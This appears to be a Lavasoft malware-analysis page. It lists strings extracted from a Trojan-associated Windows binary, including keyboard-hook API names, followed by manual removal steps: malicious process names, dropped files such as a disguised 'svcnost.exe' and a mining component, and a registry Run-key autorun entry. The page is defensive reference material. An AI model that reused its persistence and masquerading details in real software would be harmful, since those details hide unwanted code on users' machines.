Failed to set font image. wc=x sz=(%x,%x)
FullscreenControlSetColors failed - Status = 0x%x
FullscreenControlSetPalette failed - Status = 0x%x
WriteCharsFromInput failed 0x%x
WriteCharsFromInput failed %x
RtlStringCchCopyW failed with Status 0x%x
CreateFontCache failed with Status 0x%x
FTPh
\>.Sj
GetKeyboardLayout
MapVirtualKeyW
VkKeyScanW
GetKeyboardState
UnhookWindowsHookEx
SetWindowsHookExW
GetKeyState
ActivateKeyboardLayout
GetKeyboardLayoutNameA
GetKeyboardLayoutNameW
_amsg_exit
_acmdln
ShipAssert
NtReplyWaitReceivePort
NtCreatePort
NtEnumerateValueKey
NtQueryValueKey
NtOpenKey
NtAcceptConnectPort
NtReplyPort
SetProcessShutdownParameters
GetCPInfo
conhost.pdb
%$%a%b%V%U%c%Q%W%]%\%[%
%<%^%_%Z%T%i%f%`%P%l%g%h%d%e%Y%X%R%S%k%j%
version="5.1.0.0"
name="Microsoft.Windows.ConsoleHost"
<requestedExecutionLevel
name="Microsoft.Windows.ConsoleHost.SystemDefault"
publicKeyToken="6595b64144ccf1df"
name="Microsoft.Windows.SystemCompatible"
version="6.0.0.0"
publicKeyToken="6595b64144ccf1df"
< =$>:>@>
2%2X2
%SystemRoot%
\Registry\Machine\Software\Microsoft\Windows NT\CurrentVersion\Console\TrueTypeFont
\Registry\Machine\Software\Microsoft\Windows NT\CurrentVersion\Console\FullScreen
WindowSize
ColorTableu
ExtendedEditkeyCustom
ExtendedEditKey
Software\Microsoft\Windows\CurrentVersion
\ !:=/.<>;|&
%d/%d
cmd.exe
desktop.ini
\console.dll
%d/%d
6.1.7601.17641 (win7sp1_gdr.110623-1503)
CONHOST.EXE
Windows
Operating System
6.1.7601.17641


Remove it with Ad-Aware

  1. Click (here) to download and install Ad-Aware Free Antivirus.
  2. Update the definition files.
  3. Run a full scan of your computer.


Manual removal*

  1. Terminate malicious process(es) (How to End a Process With the Task Manager):

    mic.exe:264
    yfRl.exe:2924
    %original file name%.exe:2704
    setup.exe:2928

  2. Delete the original Trojan file.
  3. Delete or disinfect the following files created/modified by the Trojan:

    C:\Users\"%CurrentUserName%"\AppData\Roaming\pZUyM\yfRl.exe (48492 bytes)
    C:\Users\"%CurrentUserName%"\AppData\Roaming\pZUyM\BuocZykb\Ux (1 bytes)
    C:\Users\"%CurrentUserName%"\AppData\Roaming\pZUyM\BuocZykb\F (2 bytes)
    C:\Users\"%CurrentUserName%"\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\4ZZNMJGQ\10[1].htm (879 bytes)
    C:\Users\"%CurrentUserName%"\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\25FDO7QC\32_2[1].mining (283058 bytes)
    C:\Users\"%CurrentUserName%"\AppData\Roaming\pZUyM\BuocZykb\RlyfP7 (306 bytes)
    C:\Users\"%CurrentUserName%"\AppData\Roaming\pZUyM\4DR\options (152 bytes)
    C:\Users\"%CurrentUserName%"\AppData\Roaming\pZUyM\BuocZykb\yfR (226 bytes)
    C:\Users\"%CurrentUserName%"\AppData\Roaming\pZUyM\BuocZykb\lRfy (36 bytes)
    C:\Users\"%CurrentUserName%"\AppData\Roaming\pZUyM\4DR\lel.arch (235493 bytes)
    C:\Users\"%CurrentUserName%"\AppData\Roaming\pZUyM\BuocZykb\fylRx (226 bytes)
    C:\Users\"%CurrentUserName%"\AppData\Roaming\pZUyM\4DR\svcnost.exe (269510 bytes)
    C:\Users\"%CurrentUserName%"\AppData\Roaming\pZUyM\BuocZykb\VZaqC (879 bytes)
    C:\551b45c5a2e3ajn57690b0469d26f1a3\mic.exe (24537 bytes)
    C:\Users\"%CurrentUserName%"\AppData\Local\Temp\is-O9TRG.tmp\isgsg.dll (35 bytes)
    C:\Users\"%CurrentUserName%"\AppData\Local\Temp\is-O9TRG.tmp\ISDone.dll (3681 bytes)
    C:\Users\"%CurrentUserName%"\AppData\Local\Temp\is-O9TRG.tmp\_isetup\_shfoldr.dll (47 bytes)
    C:\Users\"%CurrentUserName%"\AppData\Local\Temp\is-O9TRG.tmp\BASS.dll (601 bytes)
    C:\Users\"%CurrentUserName%"\AppData\Local\Temp\is-O9TRG.tmp\CallbackCtrl.dll (4 bytes)
    C:\Users\"%CurrentUserName%"\AppData\Local\Temp\is-TV3I5.tmp\setup.tmp (50 bytes)

  4. Delete the following value(s) in the autorun key (How to Work with System Registry):

    [HKCU\Software\Microsoft\Windows\CurrentVersion\Run]
    "yRF" = "C:\Users\"%CurrentUserName%"\AppData\Roaming\pZUyM\yfRl.exe /yfRlFxP79ACugWTUxUTlVaBNuyoJcpZUyMkebi17VoZjaPqHCA4cxDScRhqpiAG"

  5. Clean the Temporary Internet Files folder, which may contain infected files (How to clean Temporary Internet Files folder).
  6. Reboot the computer.

*Manual removal may cause unexpected system behaviour and should be performed at your own risk.

No votes yet


Lavasoft is the maker of Ad-Aware, the world's most popular anti-malware software with over 450 million downloads.
© 2026 Lavasoft. All rights reserved.
Terms Of Use |   Privacy Policy


x

Our best antivirus yet!

Fresh new look. Faster scanning. Better protection.

Enjoy unique new features, lightning fast scans and a simple yet beautiful new look in our best antivirus yet!

For a quicker, lighter and more secure experience, download the all new adaware antivirus 12 now!

Download adaware antivirus 12
No thanks, continue to lavasoft.com
close x

Discover the new adaware antivirus 12

Our best antivirus yet

Download Now